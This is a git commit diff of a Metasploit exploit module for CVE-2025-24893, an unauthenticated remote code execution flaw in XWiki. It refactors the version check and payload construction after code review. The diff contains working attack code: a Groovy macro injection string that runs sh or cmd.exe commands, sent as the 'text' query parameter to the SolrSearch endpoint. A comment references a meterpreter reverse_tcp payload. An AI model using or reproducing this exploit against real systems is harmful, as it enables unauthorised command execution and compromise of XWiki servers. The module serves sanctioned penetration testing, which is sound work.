Code Review Edits from @msutovsky-r7

vognik · vognik · commit 92ddf5646a98 · 2025-08-24T19:13:16.000+04:00
diff --git a/modules/exploits/multi/http/xwiki_unauth_rce_cve_2025_24893.rb b/modules/exploits/multi/http/xwiki_unauth_rce_cve_2025_24893.rb
@@ -20,7 +20,7 @@ def initialize(info = {})
           The vulnerability stems from the way this macro evaluates search parameters in Groovy, failing to sanitize or restrict malicious input.
 
           This vulnerability affects XWiki Platform versions >= 5.3-milestone-2 and < 15.10.11, and versions >= 16.0.0-rc-1 and < 16.4.1.
-          Successful exploitation may result in remote code execution under the privileges
+          Successful exploitation may result in the remote code execution under the privileges
           of the web server, potentially exposing sensitive data or disrupting survey operations.
 
           An attacker can execute arbitrary system commands in the context of the user running the web server.
@@ -34,7 +34,7 @@ def initialize(info = {})
           ['CVE', '2025-24893'],
           ['URL', 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j']
         ],
-        'Platform' => ['multi'],
+        'Platform' => ['unix', 'linux', 'win'],
         'Arch' => [ARCH_CMD],
         'Targets' => [
           [
@@ -54,7 +54,7 @@ def initialize(info = {})
           [
             'Windows Command',
             {
-              'Platform' => ['windows'],
+              'Platform' => ['win'],
               'Arch' => ARCH_CMD,
               'Type' => :win_cmd
               # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp
@@ -90,46 +90,60 @@ def check
     )
     return CheckCode::Unknown('No response from target') unless res&.code == 200
 
-    if res.body =~ %r{<div id="xwikiplatformversion">.*?XWiki.*?(\d+\.\d+\.\d+).*?</div>}m
-      version_match = Regexp.last_match(1).to_s
-      version = Rex::Version.new(version_match)
-      print_status("Extracted version: #{version}")
+    version_div = res.get_html_document.at('div[id="xwikiplatformversion"]')
+    unless version_div
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to find <div id=\"xwikiplatformversion\"> tag in response")
+      return CheckCode::Safe('Possibly not XWiki or incorrect path (version tag not found)')
+    end
 
-      if version.between?(Rex::Version.new('5.3.0'), Rex::Version.new('15.10.11')) ||
-         version.between?(Rex::Version.new('16.0.0'), Rex::Version.new('16.4.0'))
-        return CheckCode::Appears
-      end
-    else
+    version_match = version_div.text.match(/XWiki.*?(\d+\.\d+\.\d+)/)
+    unless version_match
       print_error("#{peer} - Unable to extract version number")
+      return CheckCode::Detected('XWiki detected, but version number missing or unrecognized')
+    end
+
+    version = Rex::Version.new(Regexp.last_match(1).to_s)
+    print_status("Extracted version: #{version}")
+
+    if version.between?(Rex::Version.new('5.3.0'), Rex::Version.new('15.10.10')) ||
+       version.between?(Rex::Version.new('16.0.0'), Rex::Version.new('16.4.0'))
+      return CheckCode::Appears("Detected version #{version}, which is vulnerable")
     end
 
-    CheckCode::Safe
+    return CheckCode::Safe("Version #{version} appears safe")
   end
 
   def build_cmd
+    print_status('Building command for target...')
+
     if target['Type'] == :unix_cmd
       cmd_array = "'sh', '-c', '#{payload.encoded}'"
     else
-      cmd_array = "'cmd.exe', '/B', '/q', '/c', '#{payload.encoded}'"
+      cmd_array = "'cmd.exe', '/b', '/q', '/c', '#{payload.encoded}'"
     end
 
-    Rex::Text.uri_encode("}}}{{async async=false}}{{groovy}}[#{cmd_array}].execute(){{/groovy}}{{/async}}")
+    print_good('Command successfully built for target')
+
+    return "}}}{{async async=false}}{{groovy}}[#{cmd_array}].execute(){{/groovy}}{{/async}}"
   end
 
-  def exploit
-    print_status('Building command for target...')
-    cmd = build_cmd
+  def send_payload(cmd)
+    print_status('Uploading payload...')
 
-    print_status('Uploading malicious payload...')
-    query_string = [
-      'media=rss',
-      "text=#{cmd}",
-    ].join('&')
+    vars_get = {
+      'media' => 'rss',
+      'text' => cmd
+    }
 
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, '/xwiki/bin/get/Main/SolrSearch'),
       'method' => 'GET',
-      'query' => query_string
+      'vars_get' => vars_get
     })
   end
+
+  def exploit
+    cmd = build_cmd
+    send_payload(cmd)
+  end
 end
